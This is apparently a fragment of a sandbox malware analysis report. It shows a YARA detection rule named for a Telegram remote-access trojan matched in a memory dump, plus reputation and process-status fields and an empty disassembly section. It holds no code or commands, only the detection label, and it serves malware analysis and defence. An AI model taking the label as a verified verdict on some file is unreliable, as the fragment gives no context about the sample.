                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2558138839.0000000025871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Disassembly

                                                                                                                                                    Reset < >